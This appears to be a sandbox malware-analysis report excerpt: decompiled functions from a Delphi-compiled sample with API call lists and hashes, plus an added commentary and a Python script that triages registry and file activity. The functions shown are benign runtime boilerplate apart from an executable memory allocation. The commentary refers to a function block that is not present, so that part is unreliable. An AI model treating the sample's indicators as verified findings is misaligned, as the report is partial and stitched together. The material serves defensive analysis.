                                                    C-Code - Quality: 100%
                                                    			E00405F94(void* __eax) {
                                                    				char _v272;
                                                    				intOrPtr _t14;
                                                    				void* _t16;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t19;
                                                    
                                                    				_t16 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
                                                    					_t14 = E004061D0(_t19); // executed
                                                    					_t18 = _t14;
                                                    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                    					if(_t18 == 0) {
                                                    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                    					}
                                                    				}
                                                    				return  *((intOrPtr*)(_t16 + 0x10));
                                                    			}
                                                     Address column: 0x00405f9c 0x00405fa2 0x00405fb2 0x00405fbb 0x00405fc0 0x00405fc2 0x00405fc7 0x00405fcc 0x00405fcc 0x00405fc7 0x00405fda

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                      • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                      • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                    • String ID:
                                                    • API String ID: 2796650324-0
                                                    • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                    • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
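Two of the blocks above are worth reading together. E00432310 is a registry-write wrapper: it calls RegSetValueExA on a handle stored in the object, takes the value type from the helper L00431D9C, and on a non-zero result builds an error record and hands it to E0040D23C/E00404378 instead of silently returning. E00405F94 reaches, through subcall 004061D0, GetModuleFileNameA followed by RegOpenKeyExA on HKCU Software\Borland\Locales, HKLM Software\Borland\Locales and HKCU Software\Borland\Delphi\Locales. That exact three-key sequence is the Delphi RTL locale-override lookup (SysUtils) that every Delphi-compiled executable runs at start-up to find a localized resource DLL, so on its own it is compiler boilerplate rather than attacker-written registry reconnaissance; a triage script should separate it from genuine registry reads. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses blocks in this report's format, collects each function's direct and subcall API references, and tags registry/file writes while labelling the Delphi locale pattern. SAMPLE_REPORT is a constructed, abbreviated excerpt of the two blocks; the tag names, hive table and API sets are the example's own choices.

```python
"""Parse per-function blocks from a Joe Sandbox C-Code dump (the format of
this report) and tag what each function reaches through the Win32 API."""
import re

# Constructed excerpt in the report's own format, abbreviated from the
# E00432310 and E00405F94 blocks above; not produced by any tool run here.
SAMPLE_REPORT = r"""
C-Code - Quality: 100%
            E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                _t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
            }

APIs
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
Memory Dump Source
• Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Value

C-Code - Quality: 100%
            E00405F94(void* __eax) {
                GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
            }

APIs
• GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4), ref: 00405FB2
  • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001), ref: 004061EC
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019), ref: 0040620A
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019), ref: 00406228
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019), ref: 00406246
  • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005), ref: 0040628F
  • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC), ref: 004062CF
• API ID: Open$FileModuleNameQueryValue$Close
"""

# Decompiled function header, e.g. "E00432310(void* __eax, ...) {"
FUNC_RE = re.compile(r"^\s*(?P<name>[EL][0-9A-F]{8})\(.*\)\s*\{\s*$")
# API bullet, direct or "Part of subcall function XXXXXXXX: Api.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<via>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}
REG_WRITE = {"RegSetValueExA", "RegSetValueExW", "RegCreateKeyExA", "RegCreateKeyExW"}
FILE_WRITE = {"WriteFile", "CreateFileA", "CreateFileW", "CopyFileA", "CopyFileW"}
# Keys read by the Delphi RTL locale-override lookup (SysUtils) in every Delphi
# executable; reading them is compiler boilerplate, not attacker logic.
DELPHI_LOCALE_KEYS = {r"Software\Borland\Locales", r"Software\Borland\Delphi\Locales"}


def parse_blocks(text):
    """Return [{'name', 'apis': [{'api','module','args','ref','via'}]}] per function."""
    funcs, cur = [], None
    for line in text.splitlines():
        m = FUNC_RE.match(line)
        if m:
            cur = {"name": m.group("name"), "apis": []}
            funcs.append(cur)
            continue
        m = API_RE.match(line)
        if m and cur is not None:
            cur["apis"].append({
                "api": m.group("api"), "module": m.group("module"),
                "args": m.group("args").split(","),
                "ref": m.group("ref"), "via": m.group("via"),   # via is None for direct calls
            })
    return funcs


def registry_keys(func):
    """(hive, subkey) pairs from RegOpenKeyEx*/RegCreateKeyEx* calls, subcalls included."""
    keys = []
    for call in func["apis"]:
        if call["api"].startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and len(call["args"]) >= 2:
            keys.append((HIVES.get(call["args"][0], call["args"][0]), call["args"][1]))
    return keys


def triage(func):
    """Coarse behaviour tags for one function, as a set of strings."""
    names = {c["api"] for c in func["apis"]}
    tags = set()
    if names & REG_WRITE:
        tags.add("registry-write")
    if names & FILE_WRITE:
        tags.add("file-write")
    keys = registry_keys(func)
    if keys and "GetModuleFileNameA" in names and all(k in DELPHI_LOCALE_KEYS for _, k in keys):
        tags.add("delphi-rtl-locale-lookup")  # benign RTL start-up pattern
    elif keys:
        tags.add("registry-read")
    return tags


def summarize(text):
    """Map function name -> {'apis': sorted API names, 'keys': [...], 'tags': sorted tags}."""
    return {
        f["name"]: {
            "apis": sorted({c["api"] for c in f["apis"]}),
            "keys": registry_keys(f),
            "tags": sorted(triage(f)),
        }
        for f in parse_blocks(text)
    }


if __name__ == "__main__":
    for name, info in summarize(SAMPLE_REPORT).items():
        print(name, info["tags"], info["keys"])
```

Run against the full report text, the same parser yields one record per decompiled function; the `via` field keeps subcall-inherited APIs distinguishable from the function's own imports, which matters when a wrapper such as E00405F94 only looks like it touches the registry because of what 004061D0 does beneath it.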

                                                    C-Code - Quality: 75%
                                                    			E00409974(void* __eax, long __ecx, void* __edx) {
                                                    				long _v16;
                                                    				int _t4;
                                                    
                                                    				_push(__ecx);
                                                    				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                    				if(_t4 == 0) {
                                                    					_v16 = 0xffffffff;
                                                    				}
                                                    				return _v16;
                                                    			}
                                                     Address column: 0x00409977 0x00409988 0x0040998f 0x00409991 0x00409991 0x0040999f

                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                    • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409A58(void* __eax) {
                                                    				signed char _t5;
                                                    
                                                    				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}




                                                    Instruction addresses: 0x00409a63, 0x00409a6b, 0x00409a74, 0x00409a75, 0x00409a78, 0x00409a78

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                    • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                    				void* _t8;
                                                    
                                                    				_t4 = _a12;
                                                    				asm("sbb eax, eax");
                                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                    				return _t8;
                                                    			}




                                                    Instruction addresses: 0x00406f93, 0x00406f9b, 0x00406fa6, 0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction ID: 98e81aead139b17a815cef7455711068e9fc67f306ce3b3ca14eba37014c667d
                                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction Fuzzy Hash: 76D0127325024DAFCB00EEBDDC05DAB33DC9728609B408425B929C7100D139E9508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                    				void* _t8;
                                                    
                                                    				_t4 = _a12;
                                                    				asm("sbb eax, eax");
                                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                    				return _t8;
                                                    			}




                                                    Instruction addresses: 0x00406f93, 0x00406f9b, 0x00406fa6, 0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040991C(void* __eax) {
                                                    				void* _t4;
                                                    
                                                    				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                    				return _t4;
                                                    			}




                                                    Instruction addresses: 0x00409939, 0x0040993f

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                    • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00409F54(void* __eax) {
                                                    				int _t4;
                                                    
                                                    				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
                                                    				asm("sbb eax, eax");
                                                    				return _t4 + 1;
                                                    			}




                                                    Instruction addresses: 0x00409f61, 0x00409f69, 0x00409f6d

                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,0047638B), ref: 00409F61
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDirectory
                                                    • String ID:
                                                    • API String ID: 4241100979-0
                                                    • Opcode ID: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                    • Instruction ID: d06271dbac5e2ad416fd06201c67f134fcd2da453fbdd723ce63acec7380a99a
                                                    • Opcode Fuzzy Hash: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                    • Instruction Fuzzy Hash: 07B092A27503411AEE0035FA2CC2B2A008CA74861AF110A3EF656E61C2D47AC8184068
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0045D2F8(signed int __eax, void* __ecx) {
                                                    				struct _ITEMIDLIST** _t10;
                                                    
                                                    				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
                                                    				return  *_t10;
                                                    			}




                                                    Instruction addresses: 0x0045d307, 0x0045d310

                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FolderLocationSpecial
                                                    • String ID:
                                                    • API String ID: 3328827890-0
                                                    • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                    • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409A7C(void* __eax) {
                                                    				long _t4;
                                                    
                                                    				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                    				return _t4;
                                                    			}




                                                    Instruction addresses: 0x00409a87, 0x00409a8d

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction ID: 67a43f86abe4dd1ef5a5c4911a27f769ef87cc39f57c29bfc39dbdecf4d4660c
                                                    • Opcode Fuzzy Hash: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction Fuzzy Hash: 58A011C0B0020022CA0032FA2CC2A0A00CC2B882283800A3EB208E2283E83CA808002C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00435634(void* __eax) {
                                                    				int _t3;
                                                    
                                                    				 *((char*)(__eax + 0x10)) = 3;
                                                    				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
                                                    				return _t3;
                                                    			}




                                                    Instruction addresses: 0x00435634, 0x00435643, 0x00435648

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Help
                                                    • String ID:
                                                    • API String ID: 2830496658-0
                                                    • Opcode ID: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction ID: 79a91a3f31a143df2f0efbcac983927cafc7536058e87a69d5408432099ce831
                                                    • Opcode Fuzzy Hash: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction Fuzzy Hash: F8B011C0BC8380BAFA2222288C0BF080C002B00F08FE000CAB2083C0C302ECA200002E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                    • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E0042E3B4(void* __ebx, void* __ecx) {
                                                    				char _v5;
                                                    				intOrPtr _t2;
                                                    				intOrPtr _t6;
                                                    				intOrPtr _t108;
                                                    				intOrPtr _t111;
                                                    
                                                    				_t2 =  *0x49ea48; // 0x3030dc8
                                                    				E0042E1AC(_t2);
                                                    				_push(_t111);
                                                    				_push(0x42e767);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t111;
                                                    				 *0x49ea44 =  *0x49ea44 + 1;
                                                    				if( *0x49ea40 == 0) {
                                                    					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
                                                    					if( *0x49ea40 > 0) {
                                                    						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
                                                    						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
                                                    						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
                                                    						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
                                                    						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                    						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                    						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
                                                    						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
                                                    						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
                                                    						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
                                                    						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
                                                    						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
                                                    						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
                                                    						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
                                                    						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
                                                    						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
                                                    						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
                                                    						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
                                                    						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
                                                    						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
                                                    						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
                                                    						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
                                                    						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
                                                    						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
                                                    						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
                                                    						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
                                                    						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
                                                    						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
                                                    						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
                                                    						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
                                                    						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
                                                    						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
                                                    						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
                                                    						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
                                                    						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
                                                    						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
                                                    						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
                                                    						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
                                                    						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
                                                    						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
                                                    						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
                                                    						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
                                                    						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
                                                    						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
                                                    						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
                                                    						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
                                                    						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
                                                    					}
                                                    				}
                                                    				_v5 =  *0x49ea40 > 0;
                                                    				_pop(_t108);
                                                    				 *[fs:eax] = _t108;
                                                    				_push(0x42e76e);
                                                    				_t6 =  *0x49ea48; // 0x3030dc8
                                                    				return E0042E1B4(_t6);
                                                    			}








                                                    Instruction addresses: 0x0042e3be, 0x0042e3c3, 0x0042e3ca, 0x0042e3cb, 0x0042e3d0, 0x0042e3d3, 0x0042e3d6, 0x0042e3df, 0x0042e3ef, 0x0042e3f4,
                                                    0x0042e407, 0x0042e419, 0x0042e42b, 0x0042e43d, 0x0042e44f, 0x0042e461, 0x0042e473, 0x0042e485, 0x0042e497, 0x0042e4a9,
                                                    0x0042e4bb, 0x0042e4cd, 0x0042e4df, 0x0042e4f1, 0x0042e503, 0x0042e515, 0x0042e527, 0x0042e539, 0x0042e54b, 0x0042e55d,
                                                    0x0042e56f, 0x0042e581, 0x0042e593, 0x0042e5a5, 0x0042e5b7, 0x0042e5c9, 0x0042e5db, 0x0042e5ed, 0x0042e5ff, 0x0042e611,
                                                    0x0042e623, 0x0042e635, 0x0042e647, 0x0042e659, 0x0042e66b, 0x0042e67d, 0x0042e68f, 0x0042e6a1, 0x0042e6b3, 0x0042e6c5,
                                                    0x0042e6d7, 0x0042e6e9, 0x0042e6fb, 0x0042e70d, 0x0042e71f, 0x0042e731, 0x0042e743, 0x0042e743, 0x0042e3f4, 0x0042e74b,
                                                    0x0042e751, 0x0042e754, 0x0042e757, 0x0042e75c, 0x0042e766

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
